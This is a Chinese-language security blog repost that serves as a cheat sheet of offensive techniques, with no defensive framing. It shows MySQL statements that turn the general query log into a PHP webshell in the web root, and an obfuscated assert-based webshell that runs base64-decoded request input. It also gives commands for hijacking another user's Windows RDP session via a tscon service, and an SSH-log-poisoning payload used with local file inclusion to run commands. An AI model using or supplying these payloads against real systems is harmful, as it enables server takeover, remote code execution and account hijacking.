安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > SQL语句利用日志写shell

SQL语句利用日志写shell

时间:2017-03-23来源:https://evi1cg.me/ 作者:安云网点击:
SQL语句利用日志写shell outfile被禁止,或者写入文件被拦截; 在数据库中操作如下:(必须是root权限) show variables like %general% ; #查看配置 set global general_log = on ; #开启general log模式 set global general_log_file = /var/www/html/1.php ; #设置日志
//内容来自安云网

 SQL语句利用日志写shell //本文来自安云网

outfile被禁止,或者写入文件被拦截; //内容来自安云网

在数据库中操作如下:(必须是root权限) //内容来自AnYun.ORG

  • show variables like '%general%';  #查看配置


  • set global general_log = on;  #开启general log模式


  • set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址


  • select '<?php eval($_POST[cmd]);?>'  #写入shell

SQL查询免杀shell的语句

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

windows切换其他登陆用户

查看用户:

  1. C:\Windows\system32>query user

  2. USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME

  3. administrator                             1  Disc            1  3/12/2017 3:07 PM

  4. >localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM


  5. C:\Windows\system32>

创建服务:

C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"[SC] CreateService SUCCESS

启动服务:

net setart sesshijack

LFI SSH日志

登陆SSH:

ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105

包含文件:

  1. http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls



本文标题: SQL语句利用日志写shell 安云网
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容